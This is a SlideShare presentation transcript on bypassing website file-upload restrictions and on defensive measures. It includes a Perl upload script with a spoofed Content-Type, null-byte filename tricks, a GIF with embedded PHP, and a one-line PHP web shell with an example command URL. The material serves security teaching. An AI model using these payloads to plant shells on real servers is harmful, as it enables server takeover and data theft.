• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Bypass file upload restrictions
 

Bypass file upload restrictions

on

  • 6,509 views

Bypass file upload restrictions

Bypass file upload restrictions

Statistics

Views

Total Views
6,509
Views on SlideShare
6,505
Embed Views
4

Actions

Likes
1
Downloads
27
Comments
1

2 Embeds 4

https://twitter.com 3
http://ensembler.wordpress.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1 previous next

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Bypass file upload restrictions Bypass file upload restrictions Presentation Transcript

    • BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES By K. Subramanian K. R. Mukesh
    • File upload • Necessity • Social networking websites, blogs, File sharing, etc. • Web developers do not consider the threats • Files should be sanitized • If not, leads to local file inclusion and hacking • Filtering mechanisms
    • Methods of filtering
    • Content-Type verification • HTTP POST – MIME type Content-Disposition: form-data; name="uploaded file []";filename="18.jpg"rn Content-Type : image/jpegrnr <file content> • To bypass this filter, edit the Content-Type to an applicable one. #!/usr/bin/perl # use LWP; use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new;; $req = $ua->request(POST 'http://example.com/upload.PHP', Content_Type => 'form-data', Content => [ userfile => ["sh.PHP", "sh.PHP", "Content-Type" => "application/pdf"], ], ); print $req->as_string();
    • An easy way – Tamper data • Tamper data – Mozilla add-on allows to modify the POST data before submit
    • Filename extension verification • Check the extension of the file • Filter out malicious extensions $blacklist = array(".php", ".phtml", ".php3", ".php4"); • To bypass this, use NULL BYTES in filename sh.php%00.pdf (or) sh.asp;xx.pdf • While uploading, extension is .pdf • When accessed, delivered to PHP interpreter
    • File content verification • Applicable to image files • $imageinfo =getimagesize($_FILES['userfile']['tmp_name']); • To bypass this, manually craft an image file with an embedded PHP code Content-Type: image/gif GIF89a(...some binary data...)<?PHP System($_GET[‘command’]);?> (....binary data…) • PHP interpreter execute the php code inside a garbage of binary values
    • A Simple Demonstration Towards Bypassing these Filters
    • Worst case scenario • Local file inclusion – PHP shell upload • Simple PHP shell: <?php System ($_GET [‘command’]);?> • Executes commands on remote server www.example.com/uploads/sh.php?command=‘ifconfig’ • Entire control of the server – rooting it • Defacements, database access, credential information theft, etc.
    • Security Measures • Preventing direct access to the uploaded files $uploaddir = '/var/spool/uploads/'; # Outside of root • Block web access using .htaccess file IndexIgnore */* • Overhead to read and write • Sometimes leads to potential directory traversal attacks
    • Random file name implementation • Prevents attacker knowing the name of the file uploaded • Map the names in the database $res = $db->query("INSERT INTO uploads SET name=?,original_name=?”) • Query while reading • A little overhead, but secure • Think again, leads to SQL injection
    • Conclusion • Complicated to implement a secure file upload facility • Many filters = slow response. Leads to Denial Of Service (DOS) attacks • Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker • Secure coding practices
    • Thank you